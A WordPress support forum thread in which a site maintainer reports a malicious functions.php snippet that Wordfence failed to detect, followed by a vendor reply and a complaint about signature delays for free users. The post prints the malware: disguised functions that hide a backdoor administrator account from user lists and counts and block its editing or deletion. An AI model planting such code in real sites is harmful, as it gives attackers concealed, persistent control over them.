Wordfence couldn’t see this hack code!!!

  • Abdallah_Mohsen

    (@abdallah_mohsen)


    2 months ago

    Hello

    i found a hack code on many of websites came to me to handle issues , and i found that Wordfence didn’t even see this code or report that its a meliaceous code that should be removed.

    here is the code block which i found in functions.php , and it created an admin user with all administrative permisions

    <?php

    if (!function_exists(‘wp_enqueue_async_script’) && function_exists(‘add_action’) && function_exists(‘wp_die’) && function_exists(‘get_user_by’) && function_exists(‘is_wp_error’) && function_exists(‘get_current_user_id’) && function_exists(‘get_option’) && function_exists(‘add_action’) && function_exists(‘add_filter’) && function_exists(‘wp_insert_user’) && function_exists(‘update_option’)) {

    add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');

function wp_enqueue_async_script($user_search) {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');

    if (is_wp_error($id) || $user_id == $id)
        return;

    global $wpdb;
    $user_search->query_where = str_replace('WHERE 1=1',
        "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
        $user_search->query_where
    );
}

function wp_generate_dynamic_cache($views) {

    $html = explode('<span class="count">(', $views['all']);
    $count = explode(')</span>', $html[1]);
    $count[0]--;
    $views['all'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];

    $html = explode('<span class="count">(', $views['administrator']);
    $count = explode(')</span>', $html[1]);
    $count[0]--;
    $views['administrator'] = $html[0] . '<span class="count">(' . $count[0] . ')</span>' . $count[1];

    return $views;
}

function wp_add_custom_meta_box() {
    $user_id = get_current_user_id();
    $id = get_option('_pre_user_id');

    if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
        wp_die(__('Invalid user ID.'));
}

function wp_schedule_event_action() {

    $id = get_option('_pre_user_id');

    if (isset($_GET['user']) && $_GET['user']
        && isset($_GET['action']) && $_GET['action'] == 'delete'
        && ($_GET['user'] == $id || !get_userdata($_GET['user'])))
        wp_die(__('Invalid user ID.'));

}



if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
    die('WP ADMIN USER EXISTS');
}

    }

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @abdallah_mohsen, thank-you for getting in touch.

    Assuming you’ve not disabled any firewall rules, the rules themselves are updating successfully inside the plugin and there aren’t any other issues with your site contacting our servers, I would suggest sending a copy of the suspicious code (or files containing it) to?samples @ wordfence . com. Just make sure to?remove any database credentials or keys/salts?in any files you send over.

    Issues can sometimes be packaged in a different way to cases seen before by our scans as threats often evolve over time. If you’re able to find and clean files yourself but the issue returns later, it may be recreated by another file somewhere. If there’s another issue our Threat Intelligence team may be able to identify that and recommend the next steps you can take.

    Many thanks,
    Peter.

    Thread Starter Abdallah_Mohsen

    (@abdallah_mohsen)

    Thank you for replying.

    I was able to remove the code manually, but it reappeared. I ran another scan with Wordfence, but it didn’t detect anything—everything came back clean.

    How can I configure Wordfence to recognize this code as suspicious and ensure it removes it from any file that contains it?

    i send an email to samples @ wordfence . com with the code already.

    Thread Starter Abdallah_Mohsen

    (@abdallah_mohsen)

    Well after contacting support at samples @ wordfence, they replied :

    “Thank you for reaching out. The malware sample you shared is detected by Wordfence Premium since last month. Signatures will be available to free users next week, as per our policy.”

    So, essentially, if you’re using the free version, you’re vulnerable to known threats for over a month until signatures are released. This raises concerns about the effectiveness of the free version—what’s the point of installing it if it leaves users unprotected for so long?

Viewing 3 replies - 1 through 3 (of 3 total)
  • You must be logged in to reply to this topic.